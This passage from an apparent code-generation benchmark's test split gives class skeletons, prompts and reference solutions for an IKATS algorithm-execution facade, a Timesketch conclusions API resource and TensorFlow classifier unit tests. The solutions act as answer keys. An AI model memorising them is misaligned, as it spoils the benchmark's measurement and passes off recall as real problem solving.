instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n <|body_0|>\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data\"\"\"\n <|body_1|>\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n<|end_body_1|>\n\n<|body_start_2|>\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n<|end_body_2|>\n", "revision_id": "0b04ab448faf1ffdc89687268c6192e69d61f890", "skeleton": "<|skeleton|>\nclass FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n <|body_0|>\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data\"\"\"\n <|body_1|>\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data\"\"\"\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/ikats/processing/apps/algo/execute/models/business/facade.py", "source_repo": "IKATS/ikats-pybase", "split": "test", "star_events_count": 0} {"blob_id": "66f4852fd4f4ffadd33f36f25760bfa23338c89c", "bodies": ["sketch = Sketch.query.get_with_acl(sketch_id)\nif not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\nquestion = InvestigativeQuestion.query.get(question_id)\nif not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\nconclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\nreturn self.to_json(conclusions)", "sketch = Sketch.query.get_with_acl(sketch_id)\nif not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\nquestion = InvestigativeQuestion.query.get(question_id)\nif not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\nconclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\nform = request.json\nif not form:\n form = request.data\nconclusion_text = form.get('conclusionText')\nif conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\nreturn self.to_json(conclusion)"], "bodies_text": "<|body_start_0|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n<|end_body_0|>\n\n<|body_start_1|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n<|end_body_1|>\n", "class_docstring": "Resource for investigative question conclusion.", "class_name": "QuestionConclusionListResource", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n <|body_0|>\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n<|end_body_0|>\n\n<|body_start_1|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000456", "length_bytes": 15391, "license_type": "permissive", "methods": [{"docstring": "Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.", "name": "get", "signature": "def get(self, sketch_id, question_id)"}, {"docstring": "Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.", "name": "post", "signature": "def post(self, sketch_id, question_id)"}], "n_methods": 2, "prompt": "Implement the Python class `QuestionConclusionListResource` described below.\n\nClass description:\nResource for investigative question conclusion.\n\nMethod signatures and docstrings:\n- def get(self, sketch_id, question_id): Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\n- def post(self, sketch_id, question_id): Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.", "prompted_full_text": "Implement the Python class `QuestionConclusionListResource` described below.\n\nClass description:\nResource for investigative question conclusion.\n\nMethod signatures and docstrings:\n- def get(self, sketch_id, question_id): Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\n- def post(self, sketch_id, question_id): Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\n\n<|skeleton|>\nclass QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n <|body_0|>\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n<|end_body_0|>\n\n<|body_start_1|>\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n<|end_body_1|>\n", "revision_id": "24f471b58ca4a87cb053961b5f05c07a544ca7b8", "skeleton": "<|skeleton|>\nclass QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n <|body_0|>\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class QuestionConclusionListResource:\n \"\"\"Resource for investigative question conclusion.\"\"\"\n\n def get(self, sketch_id, question_id):\n \"\"\"Handles GET request to the resource. Returns: A list of JSON representations of the conclusions.\"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusions = InvestigativeQuestionConclusion.filter_by(investigativequestion=question).all()\n return self.to_json(conclusions)\n\n def post(self, sketch_id, question_id):\n \"\"\"Handles POST request to the resource. Adds or edits a conclusion. Returns: A JSON representation of the conclusion.\"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No sketch found with this ID')\n question = InvestigativeQuestion.query.get(question_id)\n if not question:\n abort(HTTP_STATUS_CODE_NOT_FOUND, 'No question found with this ID')\n conclusion = InvestigativeQuestionConclusion.get_or_create(user=current_user, investigativequestion=question)\n form = request.json\n if not form:\n form = request.data\n conclusion_text = form.get('conclusionText')\n if conclusion_text:\n conclusion.conclusion = conclusion_text\n db_session.add(conclusion)\n db_session.commit()\n return self.to_json(conclusion)\n", "source": "the_stack_v2_python_sparse", "source_path": "timesketch/api/v1/resources/scenarios.py", "source_repo": "google/timesketch", "split": "test", "star_events_count": 2263} {"blob_id": "0afd4d6d8b8c52b30b8fe331a2ff48e628a88e87", "bodies": ["bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\nsingle_layer = bsscs.create_layer(512, activation=tf.nn.relu)\nself.assertTrue(single_layer != None)", "bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\ninput_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\nlabels_ph = tf.placeholder(tf.float32, shape=[None, 2])\nloss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\nself.assertTrue(loss_function != None)\nloss_function_var = bsscs.get_loss()\nself.assertTrue(loss_function_var == loss_function)", "bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\noptimizer = bsscs.create_optimizer()\nself.assertTrue(optimizer != None)\noptimizer_var = bsscs.get_optimizer()\nself.assertTrue(optimizer == optimizer_var)", "bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\nself.assertTrue(bsscs != None)\nclassifier = bsscs.create_classifier([125, 12])\nself.assertTrue(classifier != None)"], "bodies_text": "<|body_start_0|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n<|end_body_0|>\n\n<|body_start_1|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n<|end_body_1|>\n\n<|body_start_2|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n<|end_body_2|>\n\n<|body_start_3|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n<|end_body_3|>\n", "class_docstring": "", "class_name": "ClassifierNetworkTests", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ClassifierNetworkTests:\n\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n <|body_0|>\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n <|body_1|>\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n <|body_2|>\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n<|end_body_0|>\n\n<|body_start_1|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n<|end_body_1|>\n\n<|body_start_2|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n<|end_body_2|>\n\n<|body_start_3|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000457", "length_bytes": 3035, "license_type": "no_license", "methods": [{"docstring": "Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created", "name": "test_layer_creation", "signature": "def test_layer_creation(self)"}, {"docstring": "Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists", "name": "test_loss_creation", "signature": "def test_loss_creation(self)"}, {"docstring": "Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created", "name": "test_optimizer_creation", "signature": "def test_optimizer_creation(self)"}, {"docstring": "Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions", "name": "test_classifier_creation", "signature": "def test_classifier_creation(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_val_000308", "prompt": "Implement the Python class `ClassifierNetworkTests` described below.\n\nClass description:\nImplement the ClassifierNetworkTests class.\n\nMethod signatures and docstrings:\n- def test_layer_creation(self): Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\n- def test_loss_creation(self): Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\n- def test_optimizer_creation(self): Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\n- def test_classifier_creation(self): Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions", "prompted_full_text": "Implement the Python class `ClassifierNetworkTests` described below.\n\nClass description:\nImplement the ClassifierNetworkTests class.\n\nMethod signatures and docstrings:\n- def test_layer_creation(self): Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\n- def test_loss_creation(self): Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\n- def test_optimizer_creation(self): Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\n- def test_classifier_creation(self): Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\n\n<|skeleton|>\nclass ClassifierNetworkTests:\n\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n <|body_0|>\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n <|body_1|>\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n <|body_2|>\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n<|end_body_0|>\n\n<|body_start_1|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n<|end_body_1|>\n\n<|body_start_2|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n<|end_body_2|>\n\n<|body_start_3|>\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n<|end_body_3|>\n", "revision_id": "d665ca405bdf35fdb57f8149a10b90be82d8de22", "skeleton": "<|skeleton|>\nclass ClassifierNetworkTests:\n\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n <|body_0|>\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n <|body_1|>\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n <|body_2|>\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ClassifierNetworkTests:\n def test_layer_creation(self):\n \"\"\"Tests the creation of a default layer preconditions: No layer has been created postconditions: layer with default placeholder has been created\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n single_layer = bsscs.create_layer(512, activation=tf.nn.relu)\n self.assertTrue(single_layer != None)\n\n def test_loss_creation(self):\n \"\"\"Tests the creation of a loss function preconditions: no loss function has been created postconditions: A loss function has been created and exists\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n input_ph = tf.placeholder(tf.float32, shape=[None, 512, 512])\n labels_ph = tf.placeholder(tf.float32, shape=[None, 2])\n loss_function = bsscs.create_loss_function(input=input_ph, labels=labels_ph)\n self.assertTrue(loss_function != None)\n loss_function_var = bsscs.get_loss()\n self.assertTrue(loss_function_var == loss_function)\n\n def test_optimizer_creation(self):\n \"\"\"Tests the creation of an optimizer for the tests preconditions: an optmizer hasn't been created postconditions: an optimizer has been created\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n optimizer = bsscs.create_optimizer()\n self.assertTrue(optimizer != None)\n optimizer_var = bsscs.get_optimizer()\n self.assertTrue(optimizer == optimizer_var)\n\n def test_classifier_creation(self):\n \"\"\"Tests the creation of a full FC graph preconditions: a FC graph hasn't been created postconditions: a FC graph has been created covering all functions\"\"\"\n bsscs = BSSCS_CLASSIFIER(l2_reg=tf.contrib.layers.l2_regularizer(scale=0.001), learning_rate=0.001, steps=250, batch=250)\n self.assertTrue(bsscs != None)\n classifier = bsscs.create_classifier([125, 12])\n self.assertTrue(classifier != None)\n", "source": "the_stack_v2_python_sparse", "source_path": "BSSCSFramework/classifier_tests.py", "source_repo": "wezleysherman/TBI-NN-421", "split": "test", "star_events_count": 3} 